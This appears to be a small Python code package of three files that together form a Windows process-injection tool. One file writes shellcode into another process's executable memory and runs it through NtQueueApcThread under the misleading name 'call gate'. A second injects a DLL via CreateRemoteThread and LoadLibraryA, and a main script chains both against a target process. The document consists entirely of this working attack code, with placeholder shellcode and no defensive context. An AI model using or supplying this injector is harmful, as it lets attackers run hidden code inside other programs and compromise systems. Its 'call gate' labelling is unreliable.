[
    {
        "file_name": "call_gate.py",
        "file_content": "import ctypes\nfrom ctypes import wintypes\n\n# Load necessary Windows API functions\nkernel32 = ctypes.WinDLL('kernel32')\nntdll = ctypes.WinDLL('ntdll')\n\n# Define necessary structures and constants\nclass SYSTEM_INFO(ctypes.Structure):\n    _fields_ = [\n        (\"wProcessorArchitecture\", wintypes.WORD),\n        (\"wReserved\", wintypes.WORD),\n        (\"dwPageSize\", wintypes.DWORD),\n        (\"lpMinimumApplicationAddress\", ctypes.POINTER(wintypes.BYTE)),\n        (\"lpMaximumApplicationAddress\", ctypes.POINTER(wintypes.BYTE)),\n        (\"dwActiveProcessorMask\", wintypes.DWORD),\n        (\"dwNumberOfProcessors\", wintypes.DWORD),\n        (\"dwProcessorType\", wintypes.DWORD),\n        (\"dwAllocationGranularity\", wintypes.DWORD),\n        (\"wProcessorLevel\", wintypes.WORD),\n        (\"wProcessorRevision\", wintypes.WORD),\n    ]\n\nPROCESS_ALL_ACCESS = 0x001F0FFF\nTHREAD_ALL_ACCESS = 0x001F03FF\nMEM_COMMIT = 0x00001000\nMEM_RESERVE = 0x00002000\nPAGE_EXECUTE_READWRITE = 0x40\n\ndef create_call_gate(target_process_id, target_thread_id, shellcode):\n    # Get system information\n    system_info = SYSTEM_INFO()\n    kernel32.GetSystemInfo(ctypes.byref(system_info))\n\n    # Open the target process\n    target_process = kernel32.OpenProcess(PROCESS_ALL_ACCESS, False, target_process_id)\n    if not target_process:\n        raise ctypes.WinError()\n\n    # Open the target thread\n    target_thread = kernel32.OpenThread(THREAD_ALL_ACCESS, False, target_thread_id)\n    if not target_thread:\n        raise ctypes.WinError()\n\n    # Allocate memory in the target process\n    allocated_memory = kernel32.VirtualAllocEx(target_process, None, len(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE)\n    if not allocated_memory:\n        raise ctypes.WinError()\n\n    # Write the shellcode to the allocated memory\n    written_bytes = ctypes.c_size_t()\n    if not kernel32.WriteProcessMemory(target_process, allocated_memory, shellcode, len(shellcode), ctypes.byref(written_bytes)):\n        raise ctypes.WinError()\n\n    # Queue an APC to the target thread\n    if not ntdll.NtQueueApcThread(target_thread, allocated_memory, None, None, None):\n        raise ctypes.WinError()\n\n    # Close handles\n    kernel32.CloseHandle(target_process)\n    kernel32.CloseHandle(target_thread)\n\n# Example usage\nif __name__ == \"__main__\":\n    target_process_id = 1234  # Replace with the actual target process ID\n    target_thread_id = 5678   # Replace with the actual target thread ID\n    shellcode = b\"\\x90\" * 100  # Replace with actual shellcode\n\n    create_call_gate(target_process_id, target_thread_id, shellcode)"
    },
    {
        "file_name": "dll_injector.py",
        "file_content": "import ctypes\nfrom ctypes import wintypes\n\n# Load necessary Windows API functions\nkernel32 = ctypes.WinDLL('kernel32')\n\n# Define necessary constants\nPROCESS_ALL_ACCESS = 0x001F0FFF\nTHREAD_ALL_ACCESS = 0x001F03FF\nMEM_COMMIT = 0x00001000\nMEM_RESERVE = 0x00002000\nPAGE_READWRITE = 0x04\n\ndef inject_dll(target_process_id, dll_path):\n    # Open the target process\n    target_process = kernel32.OpenProcess(PROCESS_ALL_ACCESS, False, target_process_id)\n    if not target_process:\n        raise ctypes.WinError()\n\n    # Get the address of LoadLibraryA in kernel32.dll\n    load_library_addr = kernel32.GetProcAddress(kernel32.GetModuleHandleW(\"kernel32.dll\"), \"LoadLibraryA\")\n\n    # Allocate memory in the target process for the DLL path\n    dll_path_bytes = dll_path.encode('utf-8')\n    allocated_memory = kernel32.VirtualAllocEx(target_process, None, len(dll_path_bytes) + 1, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE)\n    if not allocated_memory:\n        raise ctypes.WinError()\n\n    # Write the DLL path to the allocated memory\n    written_bytes = ctypes.c_size_t()\n    if not kernel32.WriteProcessMemory(target_process, allocated_memory, dll_path_bytes, len(dll_path_bytes) + 1, ctypes.byref(written_bytes)):\n        raise ctypes.WinError()\n\n    # Create a remote thread in the target process to call LoadLibraryA with the DLL path\n    thread_id = ctypes.c_size_t()\n    remote_thread = kernel32.CreateRemoteThread(target_process, None, 0, load_library_addr, allocated_memory, 0, ctypes.byref(thread_id))\n    if not remote_thread:\n        raise ctypes.WinError()\n\n    # Wait for the remote thread to finish\n    kernel32.WaitForSingleObject(remote_thread, -1)\n\n    # Close handles\n    kernel32.CloseHandle(remote_thread)\n    kernel32.CloseHandle(target_process)\n\n# Example usage\nif __name__ == \"__main__\":\n    target_process_id = 1234  # Replace with the actual target process ID\n    dll_path = \"C:\\\\path\\\\to\\\\your\\\\dll.dll\"  # Replace with the actual DLL path\n\n    inject_dll(target_process_id, dll_path)"
    },
    {
        "file_name": "main.py",
        "file_content": "from call_gate import create_call_gate\nfrom dll_injector import inject_dll\n\ndef main():\n    target_process_id = 1234  # Replace with the actual target process ID\n    target_thread_id = 5678   # Replace with the actual target thread ID\n    shellcode = b\"\\x90\" * 100  # Replace with actual shellcode\n    dll_path = \"C:\\\\path\\\\to\\\\your\\\\dll.dll\"  # Replace with the actual DLL path\n\n    # Inject DLL into the target process\n    inject_dll(target_process_id, dll_path)\n\n    # Create a call gate and execute shellcode in the target process\n    create_call_gate(target_process_id, target_thread_id, shellcode)\n\nif __name__ == \"__main__\":\n    main()"
    }
]